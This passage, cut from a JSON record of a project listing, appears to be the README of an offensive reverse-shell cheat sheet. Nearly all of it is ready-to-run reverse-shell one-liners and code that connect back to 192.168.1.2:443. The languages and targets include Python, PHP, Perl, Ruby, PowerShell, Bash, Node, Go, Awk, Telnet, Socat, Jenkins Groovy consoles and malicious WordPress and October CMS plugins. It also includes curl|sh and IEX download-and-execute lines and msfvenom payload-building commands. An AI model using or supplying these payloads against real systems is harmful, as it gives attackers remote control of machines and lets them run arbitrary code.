/bin/sh\");\n?\u003e\n```\n\n\u003ckbd\u003eCompress\u003c/kbd\u003e\n\n```sh\nzip plugin.zip plugin.php\n```\n\n\u003ckbd\u003eSteps\u003c/kbd\u003e\n\n* Plugins\n\n* Add New\n\n* Upload Plugin\n\n* Install Now\n\n* Activate Plugin\n\n---\n\n# \u003ckbd\u003eOctober\u003c/kbd\u003e\n\n```cmd\nfunction onstart(){\n  exec(\"/bin/bash -c 'bash -i \u003e\u0026 /dev/tcp/192.168.1.2/443 0\u003e\u00261'\");\n}\n```\n\n---\n\n# \u003ckbd\u003eJenkins\u003c/kbd\u003e\n\n# \u003ckbd\u003eJenkins Windows\u003c/kbd\u003e\n\n\u003ckbd\u003eNetcat (Method 1)\u003c/kbd\u003e\n\n```cmd\ncmd = \"\\\\\\\\192.168.1.2\\\\a\\\\nc.exe -e cmd 192.168.1.2 443\"\ncmd.execute().text\n```\n\n\u003ckbd\u003eNetcat (Method 2)\u003c/kbd\u003e\n\n```cmd\nprintln \"\\\\\\\\192.168.1.2\\\\a\\\\nc.exe -e cmd 192.168.1.2 443\" .execute().text\n```\n\n\u003ckbd\u003eCMD\u003c/kbd\u003e\n\n```cmd\nString host=\"192.168.1.2\";\nint port=443;\nString cmd=\"cmd.exe\";\nProcess p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()\u003e0)so.write(pi.read());while(pe.available()\u003e0)so.write(pe.read());while(si.available()\u003e0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();\n```\n\n\u003ckbd\u003ePowerShell\u003c/kbd\u003e\n\n```cmd\ncommand = \"powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.2:8000/reverse.ps1')\"\nprintln(command.execute().text)\n```\n\n# \u003ckbd\u003eJenkins Linux\u003c/kbd\u003e\n\n\u003ckbd\u003eNetcat (Method 1)\u003c/kbd\u003e\n\n```cmd\ncmd = \"nc -e /bin/sh 192.168.1.10 443\"\ncmd.execute().text\n```\n\u003ckbd\u003eNetcat (Method 2)\u003c/kbd\u003e\n\n```cmd\n\"nc -e /bin/sh 192.168.1.2 443\".execute().text\n```\n\n\u003ckbd\u003eBash\u003c/kbd\u003e\n\n```cmd\nString host=\"192.168.1.2\";\nint port=443;\nString cmd=\"bash\";\nProcess p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()\u003e0)so.write(pi.read());while(pe.available()\u003e0)so.write(pe.read());while(si.available()\u003e0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();\n```\n\n---\n\n# \u003ckbd\u003ePerl\u003c/kbd\u003e\n\n```cmd\nperl -e 'use Socket;$i=\"192.168.1.2\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/sh -i\");};'\n```\n\n---\n\n# \u003ckbd\u003ePython\u003c/kbd\u003e\n\n\u003ckbd\u003eSh\u003c/kbd\u003e\n\n```cmd\nexport RHOST=\"192.168.1.2\";export RPORT=443;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"sh\")'\n```\n\n```cmd\nexport RHOST=\"192.168.1.2\";export RPORT=443;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")'\n```\n\n```cmd\npython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.2\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"sh\")'\n```\n\n```cmd\npython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.2\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/sh\")'\n```\n\n\u003ckbd\u003eBash\u003c/kbd\u003e\n\n```cmd\nexport RHOST=\"192.168.1.2\";export RPORT=443;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"bash\")'\n```\n\n```cmd\nexport RHOST=\"192.168.1.2\";export RPORT=443;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/bash\")'\n```\n\n```cmd\npython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.2\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"bash\")'\n```\n\n```cmd\npython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.2\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'\n```\n\n---\n\n# \u003ckbd\u003ePython3\u003c/kbd\u003e\n\n\u003ckbd\u003eSh\u003c/kbd\u003e\n\n```cmd\nexport RHOST=\"192.168.1.2\";export RPORT=443;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"sh\")'\n```\n\n```cmd\nexport RHOST=\"192.168.1.2\";export RPORT=443;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")'\n```\n\n```cmd\npython3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.2\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"sh\")'\n```\n\n```cmd\npython3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.2\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/sh\")'\n```\n\n\u003ckbd\u003eBash\u003c/kbd\u003e\n\n```cmd\nexport RHOST=\"192.168.1.2\";export RPORT=443;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"bash\")'\n```\n\n```cmd\nexport RHOST=\"192.168.1.2\";export RPORT=443;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/bash\")'\n```\n\n```cmd\npython3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.2\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"bash\")'\n```\n\n```cmd\npython3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.2\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'\n```\n\n---\n\n# \u003ckbd\u003ePHP\u003c/kbd\u003e\n\n```php\n\u003c?php exec(\"nc -e /bin/sh 192.168.1.2 443\"); ?\u003e\n```\n\n```bash\n\u003c?php exec(\"curl 192.168.1.2|sh\"); ?\u003e\n\u003c?php exec(\"wget -qO- 192.168.1.2|sh\"); ?\u003e\n```\n\n```php\n\u003c?php passthru(\"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2\u003e\u00261|nc 192.168.1.2 443 \u003e/tmp/f\"); ?\u003e\n```\n\n```php\nphp -r '$sock=fsockopen(\"192.168.1.2\",443);`/bin/sh -i \u003c\u00263 \u003e\u00263 2\u003e\u00263`;'\nphp -r '$sock=fsockopen(\"192.168.1.2\",443);exec(\"/bin/sh -i \u003c\u00263 \u003e\u00263 2\u003e\u00263\");'\nphp -r '$sock=fsockopen(\"192.168.1.2\",443);system(\"/bin/sh -i \u003c\u00263 \u003e\u00263 2\u003e\u00263\");'\nphp -r '$sock=fsockopen(\"192.168.1.2\",443);passthru(\"/bin/sh -i \u003c\u00263 \u003e\u00263 2\u003e\u00263\");'\nphp -r '$sock=fsockopen(\"192.168.1.2\",443);popen(\"/bin/sh -i \u003c\u00263 \u003e\u00263 2\u003e\u00263\", \"r\");'\nphp -r '$sock=fsockopen(\"192.168.1.2\",443);shell_exec(\"/bin/sh -i \u003c\u00263 \u003e\u00263 2\u003e\u00263\");'\nphp -r '$sock=fsockopen(\"192.168.1.2\",443);$proc=proc_open(\"/bin/sh -i\", array(0=\u003e$sock, 1=\u003e$sock, 2=\u003e$sock),$pipes);'\n```\n\n---\n\n# \u003ckbd\u003eRuby\u003c/kbd\u003e\n\n```cmd\nruby -rsocket -e'f=TCPSocket.open(\"192.168.1.2\",443).to_i;exec sprintf(\"/bin/sh -i \u003c\u0026%d \u003e\u0026%d 2\u003e\u0026%d\",f,f,f)'\nruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"192.168.1.2\",\"443\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'\nruby -rsocket -e 'c=TCPSocket.new(\"192.168.1.2\",\"443\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'\n```\n\n---\n\n# \u003ckbd\u003eXterm\u003c/kbd\u003e\n\n```cmd\nxterm -display 192.168.1.2:443\n```\n\n---\n\n# \u003ckbd\u003eNcat\u003c/kbd\u003e\n\n\u003ckbd\u003eTCP\u003c/kbd\u003e\n\n```cmd\nncat 192.168.1.2 443 -e /bin/sh\nncat 192.168.1.2 443 -e /bin/bash\n```\n\n\u003ckbd\u003eUDP\u003c/kbd\u003e\n\n```cmd\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2\u003e\u00261|ncat -u 192.168.1.2 443 \u003e/tmp/f\n```\n\n---\n\n# \u003ckbd\u003eSocat\u003c/kbd\u003e\n\n```cmd\nsocat TCP:192.168.1.2:443 EXEC:sh\n```\n```cmd\nsocat TCP:192.168.1.2:443 EXEC:'bash -li',pty,stderr,setsid,sigint,sane\n```\n\n---\n\n# \u003ckbd\u003ePowerShell\u003c/kbd\u003e\n\n```powershell\npowershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient(\"192.168.1.2\",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2\u003e\u00261 | Out-String );$sendback2  = $sendback + \"PS \" + (pwd).Path + \"\u003e \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\n```\n```powershell\npowershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('192.168.1.2',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2\u003e\u00261 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '\u003e ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"\n```\n```powershell\npowershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.2:8000/reverse.ps1')\n```\n```powershell\nC:\\Windows\\SysNative\\WindowsPowerShell\\v1.0\\powershell.exe IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.2/shell.ps1')\n```\n```powershell\npowershell -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.1.2/powercat.ps1');powercat -c 192.168.1.2 -p 443 -e cmd\"\n```\n\n---\n\n# \u003ckbd\u003eAwk\u003c/kbd\u003e\n\n```cmd\nawk 'BEGIN {s = \"/inet/tcp/0/192.168.1.2/443\"; while(42) { do{ printf \"shell\u003e\" |\u0026 s; s |\u0026 getline c; if(c){ while ((c |\u0026 getline) \u003e 0) print $0 |\u0026 s; close(c); } } while(c != \"exit\") close(s); }}' /dev/null\n```\n\n---\n\n# \u003ckbd\u003eGawk\u003c/kbd\u003e\n\n```cmd\ngawk 'BEGIN {P=443;S=\"\u003e \";H=\"192.168.1.2\";V=\"/inet/tcp/0/\"H\"/\"P;while(1){do{printf S|\u0026V;V|\u0026getline c;if(c){while((c|\u0026getline)\u003e0)print $0|\u0026V;close(c)}}while(c!=\"exit\")close(V)}}'\n```\n\n---\n\n# \u003ckbd\u003eGolang\u003c/kbd\u003e\n\n```cmd\necho 'package main;import\"os/exec\";import\"net\";func main(){c,_:=net.Dial(\"tcp\",\"192.168.1.2:443\");cmd:=exec.Command(\"/bin/sh\");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c cmd.Run()}' \u003e /tmp/t.go \u0026\u0026 go run /tmp/t.go \u0026\u0026 rm /tmp/t.go\n```\n\n---\n\n# \u003ckbd\u003eTelnet\u003c/kbd\u003e\n\n```cmd\nrm -f /tmp/p; mknod /tmp/p p \u0026\u0026 telnet 192.168.1.2 443 0/tmp/p\n```\n```cmd\ntelnet 192.168.1.2 80 | /bin/bash | telnet 192.168.1.2 443\n```\n```cmd\nmknod a p \u0026\u0026 telnet 192.168.1.2 443 0\u003ca | /bin/sh 1\u003ea\n```\n```cmd\nTF=$(mktemp -u);mkfifo $TF \u0026\u0026 telnet 192.168.1.2 443 0\u003c$TF | sh 1\u003e$TF\n```\n\n---\n\n# \u003ckbd\u003eJava\u003c/kbd\u003e\n\n```cmd\nr = Runtime.getRuntime()\np = r.exec([\"/bin/bash\",\"-c\",\"exec 5\u003c\u003e/dev/tcp/192.168.1.2/443;cat \u003c\u00265 | while read line; do \\$line 2\u003e\u00265 \u003e\u00265; done\"] as String[])\np.waitFor()\n```\n\n---\n\n# \u003ckbd\u003eNode\u003c/kbd\u003e\n\n```cmd\nrequire('child_process').exec('bash -i \u003e\u0026 /dev/tcp/192.168.1.2/443 0\u003e\u00261');\n```\n\n---\n\n# \u003ckbd\u003eMsfvenom\u003c/kbd\u003e\n\n# \u003ckbd\u003eWeb Payloads\u003c/kbd\u003e\n\n# \u003ckbd\u003ePHP Payload\u003c/kbd\u003e\n\n```cmd\nmsfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f raw \u003e reverse.php\n```\n\n```cmd\nmsfvenom -p php/reverse_php LHOST=192.168.1.2 LPORT=443 -f raw \u003e reverse.php\n```\n\n# \u003ckbd\u003eWar Payload\u003c/kbd\u003e\n\n```cmd\nmsfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f war \u003e reverse.war\n```\n\n# \u003ckbd\u003eJAR Payload\u003c/kbd\u003e\n\n```cmd\nmsfvenom -p java/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f jar \u003e reverse.jar\n```\n\n# \u003ckbd\u003eJSP Payload\u003c/kbd\u003e\n\n```cmd\nmsfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f raw \u003e reverse.jsp\n```\n\n# \u003ckbd\u003eASPX Payload\u003c/kbd\u003e\n\n```cmd\nmsfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f aspx -o reverse.aspx\nmsfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f aspx -o reverse.aspx\nmsfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f aspx -o reverse.aspx\n```\n\n---\n\n# \u003ckbd\u003eWindows Payloads\u003c/kbd\u003e\n\n# \u003ckbd\u003eWindows Listener Netcat\u003c/kbd\u003e\n\n\u003ckbd\u003ex86 - Shell\u003c/kbd\u003e\n\n```cmd\nmsfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe \u003e reverse.exe\n```\n\n\u003ckbd\u003ex64 - Shell\u003c/kbd\u003e\n\n```cmd\nmsfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe \u003e reverse.exe\n```\n\n# \u003ckbd\u003eWindows Listener Metasploit Multi Handler\u003c/kbd\u003e\n\n\u003ckbd\u003ex86 - Meterpreter\u003c/kbd\u003e\n\n```cmd\nmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe \u003e reverse.exe\n```\n\n\u003ckbd\u003ex64 - Meterpreter\u003c/kbd\u003e\n\n```cmd\nmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe \u003e reverse.exe\n```\n   \n\u003ckbd\u003ex86 - Shell\u003c/kbd\u003e\n\n```cmd\nmsfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe \u003e reverse.exe\n```\n\n\u003ckbd\u003ex64 - Shell\u003c/kbd\u003e\n\n```cmd\nmsfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe \u003e reverse.exe\n```\n\n---\n\n# \u003ckbd\u003eLinux Payloads\u003c/kbd\u003e\n \n# \u003ckbd\u003eLinux Listener Netcat\u003c/kbd\u003e\n\n\u003ckbd\u003ex86 - Shell\u003c/kbd\u003e\n\n```cmd\nmsfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf \u003e reverse.elf\n```\n \n\u003ckbd\u003ex64 - Shell\u003c/kbd\u003e\n\n```cmd\nmsfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf \u003e reverse.elf\n```\n\n---\n\n# \u003ckbd\u003eLinux Listener Metasploit Multi Handler\u003c/kbd\u003e\n\n\u003ckbd\u003ex86 - Meterpreter\u003c/kbd\u003e\n\n```cmd\nmsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf \u003e reverse.elf\n```\n\n\u003ckbd\u003ex64 - Meterpreter\u003c/kbd\u003e\n\n```cmd\nmsfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf \u003e reverse.elf\n```\n\n\u003ckbd\u003ex86 - Shell\u003c/kbd\u003e\n\n```cmd\nmsfvenom -p linux/x86/shell/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf \u003e reverse.elf\n```\n\n\u003ckbd\u003ex64 - Shell\u003c/kbd\u003e\n\n```cmd\nmsfvenom -p linux/x64/shell/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf \u003e reverse.elf\n```\n\n---\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fd4t4s3c%2FOffensiveReverseShellCheatSheet","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fd4t4s3c%2FOffensiveReverseShellCheatSheet","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fd4t4s3c%2FOffensiveReverseShellCheatSheet/lists"}